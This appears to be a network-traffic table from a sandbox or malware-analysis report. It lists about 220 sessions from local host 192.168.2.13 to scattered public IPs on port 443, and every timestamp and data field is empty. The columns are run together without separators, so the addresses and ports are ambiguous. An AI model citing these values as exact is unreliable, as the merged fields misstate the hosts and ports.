                                        20151192.168.2.1340234137.99.26.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20152192.168.2.135112264.139.44.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20153192.168.2.1340864198.96.204.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20154192.168.2.1355836173.19.180.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20155192.168.2.133751484.242.57.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20156192.168.2.133782666.232.115.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20157192.168.2.1341518183.56.45.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20158192.168.2.1356390204.154.101.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20159192.168.2.1360356143.242.69.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20160192.168.2.1358184164.61.73.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20161192.168.2.1340424147.175.157.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20162192.168.2.1349860148.187.8.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20163192.168.2.1352782200.98.92.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20164192.168.2.135003874.129.183.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20165192.168.2.1354776140.133.134.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20166192.168.2.1349842119.161.56.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20167192.168.2.1353778142.192.203.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20168192.168.2.1355414143.89.168.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20169192.168.2.1348830218.174.239.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20170192.168.2.1338660140.16.89.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20171192.168.2.133605018.135.26.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20172192.168.2.1344810100.240.103.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20173192.168.2.1356526131.25.181.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20174192.168.2.1346882118.170.52.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20175192.168.2.1350144121.72.141.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20176192.168.2.1350840107.18.10.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20177192.168.2.1360636160.136.23.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20178192.168.2.134140091.95.227.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20179192.168.2.134457412.205.84.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20180192.168.2.134287466.165.161.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20181192.168.2.1338820113.248.41.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20182192.168.2.1336010104.4.117.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20183192.168.2.135789824.70.249.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20184192.168.2.1351274135.192.235.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20185192.168.2.133607639.30.194.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20186192.168.2.134699637.17.15.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20187192.168.2.1334688158.134.186.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20188192.168.2.134069890.101.83.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20189192.168.2.1354746177.107.249.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20190192.168.2.1353940125.174.205.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20191192.168.2.134971057.170.21.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20192192.168.2.1340874130.195.24.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20193192.168.2.134579878.36.24.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20194192.168.2.1333916220.71.50.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20195192.168.2.1359014200.35.157.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20196192.168.2.134127440.36.5.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20197192.168.2.1341956182.47.241.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20198192.168.2.1337090112.243.38.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20199192.168.2.1352858188.204.141.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20200192.168.2.1346310210.189.138.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20201192.168.2.1350972177.205.232.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20202192.168.2.1342772191.77.24.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20203192.168.2.134877444.175.85.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20204192.168.2.1336050166.231.20.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20205192.168.2.134168091.24.222.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20206192.168.2.1339118112.63.232.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20207192.168.2.1345464121.22.221.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20208192.168.2.134810657.68.55.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20209192.168.2.134438446.118.118.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20210192.168.2.1343320193.22.155.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20211192.168.2.135817694.230.182.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20212192.168.2.1359622170.95.212.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20213192.168.2.1359610213.234.80.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20214192.168.2.1349326136.69.123.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20215192.168.2.1352708139.233.13.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20216192.168.2.1334452149.196.111.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20217192.168.2.1338954159.225.69.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20218192.168.2.134068486.180.255.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20219192.168.2.1357758194.230.58.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20220192.168.2.1345148160.232.78.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20221192.168.2.1358038143.237.234.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20222192.168.2.134990032.136.231.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20223192.168.2.1347430189.247.139.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20224192.168.2.133713265.107.24.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20225192.168.2.135204463.118.105.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20226192.168.2.1333362207.108.87.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20227192.168.2.1339618201.201.181.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20228192.168.2.1341240116.146.40.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20229192.168.2.1336294221.181.230.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20230192.168.2.1359236139.81.135.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20231192.168.2.135289477.144.66.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20232192.168.2.1339376217.118.213.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20233192.168.2.133959284.80.140.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20234192.168.2.134459881.135.119.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20235192.168.2.133647414.197.192.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20236192.168.2.133679464.36.70.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20237192.168.2.1348112121.14.187.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20238192.168.2.133488878.46.248.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20239192.168.2.1344768150.239.0.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20240192.168.2.1341414169.224.1.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20241192.168.2.1357174194.196.181.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20242192.168.2.1344086155.152.220.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20243192.168.2.1343984198.73.231.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20244192.168.2.133958450.132.4.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20245192.168.2.1351860206.100.13.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20246192.168.2.1357588200.9.96.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20247192.168.2.134271843.20.152.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20248192.168.2.1351564180.149.153.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20249192.168.2.1356368209.214.131.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20250192.168.2.1339060186.47.59.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20251192.168.2.133916017.153.99.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20252192.168.2.13449701.107.168.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20253192.168.2.1358632115.96.73.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20254192.168.2.134741271.30.213.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20255192.168.2.133501648.173.91.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20256192.168.2.1351030125.68.144.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20257192.168.2.134709453.243.97.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20258192.168.2.133406246.215.187.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20259192.168.2.135732818.97.233.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20260192.168.2.134028639.100.227.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20261192.168.2.1343746172.200.70.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20262192.168.2.135778839.177.53.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20263192.168.2.1341450105.78.92.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20264192.168.2.1353500113.126.24.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20265192.168.2.1339888183.16.192.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20266192.168.2.1334348202.195.177.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20267192.168.2.1359238187.175.5.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20268192.168.2.1347758104.150.179.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20269192.168.2.1360468223.50.77.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20270192.168.2.1346520200.15.47.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20271192.168.2.1355528212.214.84.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20272192.168.2.134692280.43.233.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20273192.168.2.1338882187.103.241.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20274192.168.2.134729625.92.210.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20275192.168.2.1344048150.109.223.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20276192.168.2.1355526188.157.137.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20277192.168.2.1341628154.188.91.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20278192.168.2.135909848.72.137.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20279192.168.2.1348404151.235.118.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20280192.168.2.1345550150.253.62.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20281192.168.2.1343042155.174.179.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20282192.168.2.1355066186.156.81.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20283192.168.2.13469242.243.17.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20284192.168.2.133439634.225.228.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20285192.168.2.1358778110.205.248.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20286192.168.2.1347664156.251.217.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20287192.168.2.1359924144.193.109.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20288192.168.2.134921495.169.21.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20289192.168.2.1345602174.175.113.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20290192.168.2.1356084189.90.34.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20291192.168.2.1348492106.123.252.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20292192.168.2.1340220141.202.123.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20293192.168.2.1346880145.42.125.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20294192.168.2.1346092125.69.113.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20295192.168.2.1344650221.149.6.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20296192.168.2.1355644217.168.129.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20297192.168.2.135446884.221.60.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20298192.168.2.1359628149.247.253.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20299192.168.2.133815252.199.149.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20300192.168.2.1349912181.138.150.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20301192.168.2.1343750137.198.113.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20302192.168.2.133762496.200.249.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20303192.168.2.134395276.8.105.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20304192.168.2.133831489.147.83.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20305192.168.2.134170267.61.63.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20306192.168.2.1338918213.144.102.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20307192.168.2.1336222130.201.203.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20308192.168.2.1342800140.200.195.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20309192.168.2.1342436185.8.154.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20310192.168.2.1341178161.36.75.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20311192.168.2.1346208153.119.241.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20312192.168.2.1352732130.172.200.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20313192.168.2.1340530166.122.183.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20314192.168.2.1359102155.201.24.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20315192.168.2.1360754116.156.16.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20316192.168.2.134213825.191.25.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20317192.168.2.1337240176.231.26.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20318192.168.2.1348378170.78.220.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20319192.168.2.136018027.66.240.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20320192.168.2.1350554101.71.216.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20321192.168.2.133478653.127.4.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20322192.168.2.1340934123.206.69.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20323192.168.2.133408444.47.204.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20324192.168.2.13476805.7.138.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20325192.168.2.133501054.209.246.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20326192.168.2.136019264.136.40.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20327192.168.2.1358950144.96.80.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20328192.168.2.134998469.24.29.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20329192.168.2.136017823.118.100.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20330192.168.2.1347356109.18.183.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20331192.168.2.133396650.192.217.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20332192.168.2.1350310155.62.234.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20333192.168.2.134239038.209.79.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20334192.168.2.135298251.105.253.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20335192.168.2.1333152157.89.12.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20336192.168.2.1357110193.24.193.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20337192.168.2.1337416136.103.55.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20338192.168.2.134315043.112.94.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20339192.168.2.135898066.141.174.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20340192.168.2.1333368143.205.234.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20341192.168.2.1344500104.215.190.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20342192.168.2.1348590102.146.113.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20343192.168.2.133644061.140.210.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20344192.168.2.134688087.98.241.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20345192.168.2.134220051.15.13.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20346192.168.2.1356434140.117.110.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20347192.168.2.136033084.230.250.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20348192.168.2.1335686212.15.145.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20349192.168.2.134114438.237.134.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20350192.168.2.1353434145.8.156.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20351192.168.2.1348678151.43.29.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20352192.168.2.1341294163.232.239.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20353192.168.2.1358756143.220.183.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20354192.168.2.1336500188.151.107.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20355192.168.2.1350230131.81.168.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20356192.168.2.1352850125.66.111.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20357192.168.2.134060472.126.184.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20358192.168.2.133987432.248.135.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20359192.168.2.1340598158.180.91.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20360192.168.2.1337214149.189.81.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20361192.168.2.136064289.5.23.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20362192.168.2.133405288.31.221.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20363192.168.2.133602488.138.83.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20364192.168.2.1340940163.240.205.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20365192.168.2.133448639.224.44.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20366192.168.2.1357440151.215.134.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20367192.168.2.1346512222.58.182.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20368192.168.2.1358728189.62.225.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20369192.168.2.134659860.255.94.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20370192.168.2.1347644204.10.97.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20371192.168.2.133651650.72.197.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20372192.168.2.1360582136.128.107.43443
                                        TimestampBytes transferredDirectionData


